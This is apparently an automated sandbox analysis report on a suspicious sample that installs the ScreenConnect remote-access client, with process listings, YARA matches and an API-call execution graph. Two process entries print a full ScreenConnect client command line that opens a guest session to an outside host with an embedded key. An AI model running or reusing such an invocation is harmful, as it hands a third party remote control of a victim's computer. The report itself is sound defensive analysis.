                                                                                                                                                                                                                                                MD5 hash:35981EB47CA481B1CC8F4495DA53685F
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:06:46:56
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                Imagebase:0x2513e4e0000
                                                                                                                                                                                                                                                File size:24'856 bytes
                                                                                                                                                                                                                                                MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7568 -ip 7568
                                                                                                                                                                                                                                                Imagebase:0x7d0000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 884
                                                                                                                                                                                                                                                Imagebase:0x7d0000
                                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                                Start time:06:46:57
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                Imagebase:0x210000
                                                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                Start time:06:47:42
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=0bd0.adrsxpjm0rga0n.de&p=8041&s=12a62791-f49c-4806-9cc2-0b20f2ce6bb8&k=BgIAAACkAABSU0ExAAgAAAEAAQBdRYPv%2fs%2bijGK1u%2flkqPsG%2bdG7F%2f4ax8QNSH9Yo6i7A6UZdAY2kZfgAMhSjF%2fKrmKc4KX%2fDk9ZtiCRIRrmQh3eoku1a3oxQ2phk099M%2brHxm%2fsY2PWCCL%2fy3eISyDDs8dYSd7NyaWC%2bZQBDk%2bCMboNgHDqg5TZ2DZSQbH4e9PpCOhBmemQ0OLPi7s6np%2fBxp4rKNbDymsYFM0a6KINC%2bdchq29F%2bXHGl%2fK%2fQmGvHtdIpX8%2bO%2fTtZQDOLPXW57J20w3ypOH%2bHf7phXvddrwOTzrArQoTCReWUatoySRLumG3cOPSFHex5FRYf45W%2bMRD4DXmWP56lW1jk7oCGLWlFHE&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                Imagebase:0x210000
                                                                                                                                                                                                                                                File size:95'520 bytes
                                                                                                                                                                                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:06:47:44
                                                                                                                                                                                                                                                Start date:22/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe" "RunRole" "f96fdd58-b31b-40b0-b300-0e1ead05a7df" "User"
                                                                                                                                                                                                                                                Imagebase:0x900000
                                                                                                                                                                                                                                                File size:601'376 bytes
                                                                                                                                                                                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:2.3%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:3.1%
                                                                                                                                                                                                                                                  Total number of Nodes:1462
                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                  execution_graph 6196 c03400 6197 c03412 6196->6197 6199 c03418 6196->6199 6198 c03376 15 API calls 6197->6198 6198->6199 6200 c01e00 6201 c01e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6200->6201 6202 c01e9e _ValidateLocalCookies 6201->6202 6205 c02340 RtlUnwind 6201->6205 6204 c01f27 _ValidateLocalCookies 6205->6204 5969 c03d41 5972 c0341b 5969->5972 5973 c0342a 5972->5973 5974 c03376 15 API calls 5973->5974 5975 c03444 5974->5975 5976 c03376 15 API calls 5975->5976 5977 c0344f 5976->5977 5978 c01442 5979 c01a6a GetModuleHandleW 5978->5979 5980 c0144a 5979->5980 5981 c01480 5980->5981 5982 c0144e 5980->5982 5984 c03793 _abort 23 API calls 5981->5984 5983 c01459 5982->5983 5987 c03775 5982->5987 5986 c01488 5984->5986 5988 c0355e _abort 23 API calls 5987->5988 5989 c03780 5988->5989 5989->5983 5609 c09ec3 5610 c09ed9 5609->5610 5611 c09ecd 5609->5611 5611->5610 5612 c09ed2 CloseHandle 5611->5612 5612->5610 5613 c098c5 5615 c098ed 5613->5615 5614 c09925 5615->5614 5616 c09917 5615->5616 5617 c0991e 5615->5617 5622 c09997 5616->5622 5626 c09980 5617->5626 5623 c099a0 5622->5623 5630 c0a06f 5623->5630 5625 c0991c 5627 c099a0 5626->5627 5628 c0a06f __startOneArgErrorHandling 16 API calls 5627->5628 5629 c09923 5628->5629 5632 c0a0ae __startOneArgErrorHandling 5630->5632 5634 c0a130 __startOneArgErrorHandling 5632->5634 5636 c0a472 5632->5636 5635 c0a166 _ValidateLocalCookies 5634->5635 5639 c0a786 5634->5639 5635->5625 5646 c0a495 5636->5646 5640 c0a793 5639->5640 5641 c0a7a8 5639->5641 5642 c0a7ad 5640->5642 5644 c047f9 __dosmaperr 15 API calls 5640->5644 5643 c047f9 __dosmaperr 15 API calls 5641->5643 5642->5635 5643->5642 5645 c0a7a0 5644->5645 5645->5635 5647 c0a4c0 __raise_exc 5646->5647 5648 c0a6b9 RaiseException 5647->5648 5649 c0a490 5648->5649 5649->5634 5830 c03d86 5831 c01f7d ___scrt_uninitialize_crt 7 API calls 5830->5831 5832 c03d8d 5831->5832 5990 c09146 IsProcessorFeaturePresent 5991 c01248 5992 c01250 5991->5992 6008 c037f7 5992->6008 5994 c0125b 6015 c01664 5994->6015 5996 c0191f 4 API calls 5998 c012f2 5996->5998 5997 c01270 __RTC_Initialize 6006 c012cd 5997->6006 6021 c017f1 5997->6021 6000 c01289 6000->6006 6024 c018ab InitializeSListHead 6000->6024 6002 c0129f 6025 c018ba 6002->6025 6004 c012c2 6031 c03891 6004->6031 6006->5996 6007 c012ea 6006->6007 6009 c03806 6008->6009 6010 c03829 6008->6010 6009->6010 6011 c047f9 __dosmaperr 15 API calls 6009->6011 6010->5994 6012 c03819 6011->6012 6013 c0473d _abort 21 API calls 6012->6013 6014 c03824 6013->6014 6014->5994 6016 c01670 6015->6016 6017 c01674 6015->6017 6016->5997 6018 c0191f 4 API calls 6017->6018 6020 c01681 ___scrt_release_startup_lock 6017->6020 6019 c016ea 6018->6019 6020->5997 6038 c017c4 6021->6038 6024->6002 6076 c03e2a 6025->6076 6027 c018cb 6028 c018d2 6027->6028 6029 c0191f 4 API calls 6027->6029 6028->6004 6030 c018da 6029->6030 6030->6004 6032 c04424 _abort 33 API calls 6031->6032 6033 c0389c 6032->6033 6034 c038d4 6033->6034 6035 c047f9 __dosmaperr 15 API calls 6033->6035 6034->6006 6036 c038c9 6035->6036 6037 c0473d _abort 21 API calls 6036->6037 6037->6034 6039 c017d3 6038->6039 6040 c017da 6038->6040 6044 c03c81 6039->6044 6047 c03cf1 6040->6047 6043 c017d8 6043->6000 6045 c03cf1 24 API calls 6044->6045 6046 c03c93 6045->6046 6046->6043 6050 c039f8 6047->6050 6053 c0392e 6050->6053 6052 c03a1c 6052->6043 6054 c0393a ___scrt_is_nonwritable_in_current_image 6053->6054 6061 c056e2 EnterCriticalSection 6054->6061 6056 c03948 6062 c03b40 6056->6062 6058 c03955 6072 c03973 6058->6072 6060 c03966 _abort 6060->6052 6061->6056 6063 c03b56 _abort 6062->6063 6064 c03b5e 6062->6064 6063->6058 6064->6063 6065 c0681b 24 API calls 6064->6065 6071 c03bb7 6064->6071 6067 c03bad 6065->6067 6066 c0681b 24 API calls 6068 c03bcd 6066->6068 6069 c04869 _free 15 API calls 6067->6069 6070 c04869 _free 15 API calls 6068->6070 6069->6071 6070->6063 6071->6063 6071->6066 6075 c0572a LeaveCriticalSection 6072->6075 6074 c0397d 6074->6060 6075->6074 6077 c03e48 6076->6077 6081 c03e68 6076->6081 6078 c047f9 __dosmaperr 15 API calls 6077->6078 6079 c03e5e 6078->6079 6080 c0473d _abort 21 API calls 6079->6080 6080->6081 6081->6027 5833 c01489 5836 c01853 5833->5836 5835 c0148e 5835->5835 5837 c01869 5836->5837 5839 c01872 5837->5839 5840 c01806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5837->5840 5839->5835 5840->5839 4893 c0130d 4894 c01319 ___scrt_is_nonwritable_in_current_image 4893->4894 4921 c0162b 4894->4921 4896 c01320 4897 c01473 4896->4897 4906 c0134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 4896->4906 4973 c0191f IsProcessorFeaturePresent 4897->4973 4899 c0147a 4900 c01480 4899->4900 4977 c037e1 4899->4977 4980 c03793 4900->4980 4904 c01369 4905 c013ea 4929 c01a34 4905->4929 4906->4904 4906->4905 4958 c037a9 4906->4958 4913 c01405 4964 c01a6a GetModuleHandleW 4913->4964 4916 c01410 4917 c01419 4916->4917 4966 c03784 4916->4966 4969 c0179c 4917->4969 4922 c01634 4921->4922 4983 c01bd4 IsProcessorFeaturePresent 4922->4983 4926 c01645 4927 c01649 4926->4927 4993 c01f7d 4926->4993 4927->4896 5053 c020b0 4929->5053 4932 c013f0 4933 c03457 4932->4933 5055 c0522b 4933->5055 4935 c013f8 4938 c01000 6 API calls 4935->4938 4936 c03460 4936->4935 5059 c055b6 4936->5059 4939 c011e3 Sleep 4938->4939 4940 c01096 CryptMsgGetParam 4938->4940 4941 c01215 CertCloseStore LocalFree LocalFree LocalFree 4939->4941 4942 c011f7 4939->4942 4943 c01162 CryptMsgGetParam 4940->4943 4944 c010bc LocalAlloc 4940->4944 4941->4913 4942->4941 4948 c0120a CertDeleteCertificateFromStore 4942->4948 4943->4939 4947 c01174 CryptMsgGetParam 4943->4947 4945 c01156 LocalFree 4944->4945 4946 c010d7 4944->4946 4945->4943 4949 c010e0 LocalAlloc CryptMsgGetParam 4946->4949 4947->4939 4950 c01188 CertFindAttribute CertFindAttribute 4947->4950 4948->4942 4953 c01114 CertCreateCertificateContext 4949->4953 4954 c0113d LocalFree 4949->4954 4951 c011b1 4950->4951 4952 c011b5 LoadLibraryA GetProcAddress 4950->4952 4951->4939 4951->4952 4952->4939 4955 c01133 CertFreeCertificateContext 4953->4955 4956 c01126 CertAddCertificateContextToStore 4953->4956 4954->4949 4957 c0114d 4954->4957 4955->4954 4956->4955 4957->4945 4959 c037d1 _abort 4958->4959 4959->4905 4960 c04424 _abort 33 API calls 4959->4960 4963 c03e9a 4960->4963 4961 c03f24 _abort 33 API calls 4962 c03ec4 4961->4962 4963->4961 4965 c0140c 4964->4965 4965->4899 4965->4916 5547 c0355e 4966->5547 4968 c0378f 4968->4917 4971 c017a8 ___scrt_uninitialize_crt 4969->4971 4970 c01421 4970->4904 4971->4970 4972 c01f7d ___scrt_uninitialize_crt 7 API calls 4971->4972 4972->4970 4974 c01935 _abort 4973->4974 4975 c019e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4974->4975 4976 c01a24 _abort 4975->4976 4976->4899 4978 c0355e _abort 23 API calls 4977->4978 4979 c037f2 4978->4979 4979->4900 4981 c0355e _abort 23 API calls 4980->4981 4982 c01488 4981->4982 4984 c01640 4983->4984 4985 c01f5e 4984->4985 4999 c024b1 4985->4999 4988 c01f67 4988->4926 4990 c01f6f 4991 c01f7a 4990->4991 5013 c024ed 4990->5013 4991->4926 4994 c01f90 4993->4994 4995 c01f86 4993->4995 4994->4927 4996 c02496 ___vcrt_uninitialize_ptd 6 API calls 4995->4996 4997 c01f8b 4996->4997 4998 c024ed ___vcrt_uninitialize_locks DeleteCriticalSection 4997->4998 4998->4994 5000 c024ba 4999->5000 5002 c024e3 5000->5002 5003 c01f63 5000->5003 5017 c0271d 5000->5017 5004 c024ed ___vcrt_uninitialize_locks DeleteCriticalSection 5002->5004 5003->4988 5005 c02463 5003->5005 5004->5003 5034 c0262e 5005->5034 5008 c02478 5008->4990 5011 c02493 5011->4990 5014 c02517 5013->5014 5015 c024f8 5013->5015 5014->4988 5016 c02502 DeleteCriticalSection 5015->5016 5016->5014 5016->5016 5022 c02543 5017->5022 5020 c02755 InitializeCriticalSectionAndSpinCount 5021 c02740 5020->5021 5021->5000 5023 c02560 5022->5023 5026 c02564 5022->5026 5023->5020 5023->5021 5024 c025cc GetProcAddress 5024->5023 5026->5023 5026->5024 5027 c025bd 5026->5027 5029 c025e3 LoadLibraryExW 5026->5029 5027->5024 5028 c025c5 FreeLibrary 5027->5028 5028->5024 5030 c025fa GetLastError 5029->5030 5031 c0262a 5029->5031 5030->5031 5032 c02605 5030->5032 5031->5026 5032->5031 5033 c0261b LoadLibraryExW 5032->5033 5033->5026 5035 c02543 ___vcrt_FlsGetValue 5 API calls 5034->5035 5036 c02648 5035->5036 5037 c02661 TlsAlloc 5036->5037 5038 c0246d 5036->5038 5038->5008 5039 c026df 5038->5039 5040 c02543 ___vcrt_FlsGetValue 5 API calls 5039->5040 5041 c026f9 5040->5041 5042 c02714 TlsSetValue 5041->5042 5043 c02486 5041->5043 5042->5043 5043->5011 5044 c02496 5043->5044 5045 c024a0 5044->5045 5046 c024a6 5044->5046 5048 c02669 5045->5048 5046->5008 5049 c02543 ___vcrt_FlsGetValue 5 API calls 5048->5049 5050 c02683 5049->5050 5051 c0269b TlsFree 5050->5051 5052 c0268f 5050->5052 5051->5052 5052->5046 5054 c01a47 GetStartupInfoW 5053->5054 5054->4932 5056 c05234 5055->5056 5057 c0523d 5055->5057 5062 c0512a 5056->5062 5057->4936 5544 c0555d 5059->5544 5082 c04424 GetLastError 5062->5082 5064 c05137 5102 c05249 5064->5102 5066 c0513f 5111 c04ebe 5066->5111 5069 c05156 5069->5057 5072 c05199 5136 c04869 5072->5136 5075 c0518c 5076 c05194 5075->5076 5079 c051b1 5075->5079 5133 c047f9 5076->5133 5078 c051dd 5078->5072 5142 c04d94 5078->5142 5079->5078 5080 c04869 _free 15 API calls 5079->5080 5080->5078 5083 c04440 5082->5083 5084 c0443a 5082->5084 5088 c0448f SetLastError 5083->5088 5150 c0480c 5083->5150 5145 c05904 5084->5145 5088->5064 5090 c04869 _free 15 API calls 5092 c04460 5090->5092 5091 c0446f 5093 c0445a 5091->5093 5094 c04476 5091->5094 5096 c0449b SetLastError 5092->5096 5093->5090 5162 c04296 5094->5162 5167 c03f24 5096->5167 5099 c04869 _free 15 API calls 5101 c04488 5099->5101 5101->5088 5101->5096 5103 c05255 ___scrt_is_nonwritable_in_current_image 5102->5103 5104 c04424 _abort 33 API calls 5103->5104 5106 c0525f 5104->5106 5107 c052e3 _abort 5106->5107 5109 c03f24 _abort 33 API calls 5106->5109 5110 c04869 _free 15 API calls 5106->5110 5403 c056e2 EnterCriticalSection 5106->5403 5404 c052da 5106->5404 5107->5066 5109->5106 5110->5106 5408 c03f72 5111->5408 5114 c04ef1 5116 c04f08 5114->5116 5117 c04ef6 GetACP 5114->5117 5115 c04edf GetOEMCP 5115->5116 5116->5069 5118 c062ff 5116->5118 5117->5116 5119 c0633d 5118->5119 5120 c0630d _abort 5118->5120 5122 c047f9 __dosmaperr 15 API calls 5119->5122 5120->5119 5121 c06328 HeapAlloc 5120->5121 5124 c06992 _abort 2 API calls 5120->5124 5121->5120 5123 c05167 5121->5123 5122->5123 5123->5072 5125 c052eb 5123->5125 5124->5120 5126 c04ebe 35 API calls 5125->5126 5127 c0530a 5126->5127 5128 c0535b IsValidCodePage 5127->5128 5130 c05311 _ValidateLocalCookies 5127->5130 5132 c05380 _abort 5127->5132 5129 c0536d GetCPInfo 5128->5129 5128->5130 5129->5130 5129->5132 5130->5075 5445 c04f96 GetCPInfo 5132->5445 5134 c044a8 __dosmaperr 15 API calls 5133->5134 5135 c047fe 5134->5135 5135->5072 5137 c0489d __dosmaperr 5136->5137 5138 c04874 HeapFree 5136->5138 5137->5069 5138->5137 5139 c04889 5138->5139 5140 c047f9 __dosmaperr 13 API calls 5139->5140 5141 c0488f GetLastError 5140->5141 5141->5137 5508 c04d51 5142->5508 5144 c04db8 5144->5072 5178 c05741 5145->5178 5147 c0592b 5148 c05943 TlsGetValue 5147->5148 5149 c05937 _ValidateLocalCookies 5147->5149 5148->5149 5149->5083 5156 c04819 _abort 5150->5156 5151 c04859 5153 c047f9 __dosmaperr 14 API calls 5151->5153 5152 c04844 HeapAlloc 5154 c04452 5152->5154 5152->5156 5153->5154 5154->5093 5157 c0595a 5154->5157 5156->5151 5156->5152 5191 c06992 5156->5191 5158 c05741 _abort 5 API calls 5157->5158 5159 c05981 5158->5159 5160 c0599c TlsSetValue 5159->5160 5161 c05990 _ValidateLocalCookies 5159->5161 5160->5161 5161->5091 5205 c0426e 5162->5205 5313 c06b14 5167->5313 5169 c03f35 5171 c03f3e IsProcessorFeaturePresent 5169->5171 5172 c03f5c 5169->5172 5174 c03f49 5171->5174 5175 c03793 _abort 23 API calls 5172->5175 5341 c04573 5174->5341 5177 c03f66 5175->5177 5182 c0576d 5178->5182 5183 c05771 _abort 5178->5183 5179 c05791 5181 c0579d GetProcAddress 5179->5181 5179->5183 5181->5183 5182->5179 5182->5183 5184 c057dd 5182->5184 5183->5147 5185 c057fe LoadLibraryExW 5184->5185 5189 c057f3 5184->5189 5186 c05833 5185->5186 5187 c0581b GetLastError 5185->5187 5186->5189 5190 c0584a FreeLibrary 5186->5190 5187->5186 5188 c05826 LoadLibraryExW 5187->5188 5188->5186 5189->5182 5190->5189 5194 c069d6 5191->5194 5193 c069a8 _ValidateLocalCookies 5193->5156 5195 c069e2 ___scrt_is_nonwritable_in_current_image 5194->5195 5200 c056e2 EnterCriticalSection 5195->5200 5197 c069ed 5201 c06a1f 5197->5201 5199 c06a14 _abort 5199->5193 5200->5197 5204 c0572a LeaveCriticalSection 5201->5204 5203 c06a26 5203->5199 5204->5203 5211 c041ae 5205->5211 5207 c04292 5208 c0421e 5207->5208 5222 c040b2 5208->5222 5210 c04242 5210->5099 5212 c041ba ___scrt_is_nonwritable_in_current_image 5211->5212 5217 c056e2 EnterCriticalSection 5212->5217 5214 c041c4 5218 c041ea 5214->5218 5216 c041e2 _abort 5216->5207 5217->5214 5221 c0572a LeaveCriticalSection 5218->5221 5220 c041f4 5220->5216 5221->5220 5223 c040be ___scrt_is_nonwritable_in_current_image 5222->5223 5230 c056e2 EnterCriticalSection 5223->5230 5225 c040c8 5231 c043d9 5225->5231 5227 c040e0 5235 c040f6 5227->5235 5229 c040ee _abort 5229->5210 5230->5225 5232 c0440f __fassign 5231->5232 5233 c043e8 __fassign 5231->5233 5232->5227 5233->5232 5238 c06507 5233->5238 5312 c0572a LeaveCriticalSection 5235->5312 5237 c04100 5237->5229 5239 c06587 5238->5239 5242 c0651d 5238->5242 5241 c04869 _free 15 API calls 5239->5241 5264 c065d5 5239->5264 5243 c065a9 5241->5243 5242->5239 5246 c06550 5242->5246 5249 c04869 _free 15 API calls 5242->5249 5244 c04869 _free 15 API calls 5243->5244 5245 c065bc 5244->5245 5251 c04869 _free 15 API calls 5245->5251 5252 c04869 _free 15 API calls 5246->5252 5265 c06572 5246->5265 5247 c04869 _free 15 API calls 5253 c0657c 5247->5253 5248 c065e3 5254 c06643 5248->5254 5263 c04869 15 API calls _free 5248->5263 5250 c06545 5249->5250 5266 c06078 5250->5266 5256 c065ca 5251->5256 5257 c06567 5252->5257 5258 c04869 _free 15 API calls 5253->5258 5259 c04869 _free 15 API calls 5254->5259 5261 c04869 _free 15 API calls 5256->5261 5294 c06176 5257->5294 5258->5239 5260 c06649 5259->5260 5260->5232 5261->5264 5263->5248 5306 c0667a 5264->5306 5265->5247 5267 c06089 5266->5267 5293 c06172 5266->5293 5268 c04869 _free 15 API calls 5267->5268 5272 c0609a 5267->5272 5268->5272 5269 c04869 _free 15 API calls 5270 c060ac 5269->5270 5271 c060be 5270->5271 5273 c04869 _free 15 API calls 5270->5273 5274 c060d0 5271->5274 5275 c04869 _free 15 API calls 5271->5275 5272->5269 5272->5270 5273->5271 5276 c060e2 5274->5276 5277 c04869 _free 15 API calls 5274->5277 5275->5274 5278 c060f4 5276->5278 5279 c04869 _free 15 API calls 5276->5279 5277->5276 5280 c06106 5278->5280 5281 c04869 _free 15 API calls 5278->5281 5279->5278 5282 c06118 5280->5282 5283 c04869 _free 15 API calls 5280->5283 5281->5280 5284 c0612a 5282->5284 5285 c04869 _free 15 API calls 5282->5285 5283->5282 5286 c0613c 5284->5286 5287 c04869 _free 15 API calls 5284->5287 5285->5284 5288 c0614e 5286->5288 5289 c04869 _free 15 API calls 5286->5289 5287->5286 5290 c06160 5288->5290 5291 c04869 _free 15 API calls 5288->5291 5289->5288 5292 c04869 _free 15 API calls 5290->5292 5290->5293 5291->5290 5292->5293 5293->5246 5295 c06183 5294->5295 5305 